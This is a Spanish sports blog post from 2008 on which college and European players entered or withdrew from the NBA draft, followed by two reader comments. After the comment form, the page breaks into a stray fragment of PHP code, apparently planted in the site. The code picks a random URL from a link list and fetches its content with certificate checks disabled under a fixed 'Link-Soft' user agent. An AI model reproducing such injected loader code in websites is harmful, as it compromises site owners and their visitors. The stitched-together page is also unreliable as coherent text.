Definidos los candidatos a entrar en el Draft 08

17 de June de 2008 por txusma

Ayer era la fecha máxima para que los jugadores menores de 23 años se declararan elegibles y pudimos asistir a alguna sorpresa inesperada.

Danilo Gallinari declaró hace unos días que se presentaría al draft si algun equipo le aseguraba una elección entre los 10 primeros y ayer, en su página web, apareció la noticia de que el italiano se mantendría finalmente en el draft, por lo que parece ser que algún equipo le ha prometido una elección. De hecho, realizó un workout privado con los Minnessota Timberwolves la semana pasada aunque su elección parece, a priori, demasiado alta como para elegir a Gallinari.

Otros que también estarán en el draft son Serge Ibaka que impresionó a propios y extraños en el pasado Reebok Eurocamp, Joe Alexander, que ha visto subir su cotización como la espuma, Mario Chalmers, que contempla como su triple que dio la victoria a Kansas en la última Final Four le permitirá ser escogido seguramente entre los 30 primeros o Alexis Ajinca, pivot francés que suena para primera ronda.

Por contra, Ty Lawson y Wayne Ellington no abandonarán la NCAA lo que convierte a UNC en clara favorita para ganar la próxima Final Four de la NCAA porque recordemos que Tyler Hansbrough y Danny Green también han renunciado al draft. Chase Bundinger también vuelve a la NCAA en la que ha sido una decisión extraña ya que había renunciado a realizar workouts con equipos que elegían entre los 15 primeros. Por último, Victor Claver también ha anunciado que no estará en el draft.

Comenta

2 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Lo mejor para el clever es que renuncie pq este año como mucho aspiraba a ser una de las 3 segundas rondas que tiene los blazers. Y si por alguna de aquellas tomara responsabilidades en el pamesa y mejorara podria optar a mitad-baja 1 ronda.

      Citar

  2. Dantley dice:
    #2

    El caso de Budinger es el más llamativo. No creo que vaya a subir porque su juego es el que es. Puede ser un caso Hibbert.

    En el resto de los que no van, no se pierde mucho. Eso sí, como bien dice Txusma, North Carolina queda como favoritísima al título de la NCAA

    En cuanto a Gallinari, va a tener que dejar muy clarito que se va a la NBA porque podría ser Fran Vázquez’ shock II Parte.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>